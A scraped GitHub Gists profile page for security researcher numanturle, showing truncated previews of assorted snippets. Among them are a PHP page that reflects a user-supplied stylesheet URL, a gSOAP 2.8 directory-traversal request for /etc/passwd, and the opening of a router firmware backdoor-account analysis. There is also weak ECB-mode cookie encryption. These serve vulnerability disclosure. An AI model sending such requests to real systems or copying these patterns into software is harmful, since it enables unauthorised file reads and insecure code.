Skip to content

Instantly share code, notes, and snippets.

Numan Türle numanturle

  • Diyarbakır
Block or report user

Report or block numanturle

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View MCRYPT_RIJNDAEL_256
function encryptCookie($value){
if(!$value){return false;}
$key = APP_KEY;
$text = $value;
$iv_size = mcrypt_get_iv_size(MCRYPT_RIJNDAEL_256, MCRYPT_MODE_ECB);
$iv = mcrypt_create_iv($iv_size, MCRYPT_RAND);
$crypttext = mcrypt_encrypt(MCRYPT_RIJNDAEL_256, $key, $text, MCRYPT_MODE_ECB, $iv);
return trim(base64_encode($crypttext)); //encode for cookie
}
@numanturle
numanturle / code.php
Created Jan 27, 2020
css html via content svg url
View code.php
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Title of the document</title>
<link href="<?php echo (isset($_GET['css'])?htmlspecialchars($_GET['css']):null); ?>" rel="stylesheet">
</head>
<body>
Content of the document......
</body>
View solve
import base64, json, os, random, re, subprocess, time, xml.sax
from io import StringIO
def setup(seed):
global state
state = 0
for i in range(16):
cur = seed & 3
seed >>= 2
state = (state << 4) | ((state & 3) ^ cur)
View gist:f83b4507cf419667f5ae690fe9921710
var yasakli = document.querySelectorAll('[aria-label="XXXXTopluluğu adlı kullanıcının yayınını beğenmekten vazgeç"]');
yasakli.forEach.call(yasakli, function(nesne){
nesne.click();
});
View wp update
for i in $(ls /var/cpanel/users); do if [ -f /home/$i/public_html/wp-load.php ]; then ; cd /home/$i/public_html/;rm -rf wp-admin;rm -rf wp-includes; cp /tmp/a.zip a.zip;unzip -o a.zip;rm -rf a.zip;chown -R $i:$i *;fi; done
View gSOAP 2.8 Directory Traversal
Request
############################
GET /../../../../../../../../../etc/passwd HTTP/1.1
Host: 10.200.106.101
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Response
View gist:d7a89f13c70d0ffa9e9b30bb90ccc85f
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# encoding=utf8
import urllib.request
import urllib.error
import time
from multiprocessing import Pool
start = time.time()
@numanturle
numanturle / functions.php
Created Aug 30, 2019
wordpress thumbnail
View functions.php
<?php
add_action('add_attachment', 'rename_attachment');
function rename_attachment($post_ID){
$file = get_attached_file($post_ID);
$get_file_title = get_post($post_ID);
if($get_file_title->post_parent){
$post_santize_title = sanitize_title(get_the_title($get_file_title->post_parent));
$path = pathinfo($file);
$newfilename = $post_santize_title."-".$post_ID;
@numanturle
numanturle / Vmg3312 B10b Firmware 1.00(AAPP.7) backdoor account
Last active May 13, 2019
Vmg3312 B10b Firmware Vmg3312 B10b Firmware backdoor account
View Vmg3312 B10b Firmware 1.00(AAPP.7) backdoor account
root@bitforbyte:~/xxx# binwalk 100AAPP7D0.bin
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
131072 0x20000 JFFS2 filesystem, big endian
JFFS2 filesystem extract
total 1492
1049502 drwxr-xr-x 18 root root 4096 Oct 27 23:33 .
You can’t perform that action at this time.